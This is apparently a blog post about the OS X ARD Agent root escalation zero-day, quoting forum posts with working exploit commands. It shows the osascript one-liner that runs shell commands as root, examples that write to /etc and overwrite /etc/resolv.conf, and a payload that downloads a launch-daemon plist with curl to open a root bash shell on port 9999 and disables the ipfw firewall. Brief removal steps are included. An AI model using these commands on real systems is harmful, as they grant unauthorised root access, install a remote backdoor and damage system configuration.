Zero Day: OS X ARD Agent Root Escalation Vulnerability

This is scary, I’ve tried and it works perfectly …. And now, a new OS X trojan on the loose exploiting this vulnerability.

So, what is this all about ? Usually, malwares in Mac requires root privilege to get installed just like DNSChanger. But in this case, exploiting Apple Remote Desktop (ARD) Agent vulnerability, the user can bypass this security and can gain root access.

This zero day vulnerability was actively discussed in this thread, where an anonymous reader writes:

“Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn’t switched to via fast user switching. Secure? I think not.”

And worst, another contributor in this thread divulge the real danger of this exploit.


Disconfirmed – I don’t have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.

dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "rm /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory

So, how dangerous is this? Here’s an example:

osascript -e ‘tell app “ARDAgent” to do shell script “cd

/System/Library/LaunchDaemons ; curl -o bash.plist [] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start ; ipfw disable firewall; launchctl “‘This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can ‘nc localhost 9999′ and find yourself at a root shell.

To remove, run ‘launchctl unload’ ‘launchctl unload /System/Library/LaunchDaemons/bash.plist’ and then ‘rm /System/Library/LaunchDaemons/bash.plist’

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that’s easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.


I’ve got it to run destructive things as an ordinary user without any need for authentication beyond being logged in

% osascript -e 'tell app "ARDAgent" to do shell script "echo Nasty Content > /etc/resolv.conf"' % cat /etc/resolv.conf
Nasty Content


Security is like sex. Once you’re penetrated you’re ****ed. By AppleKid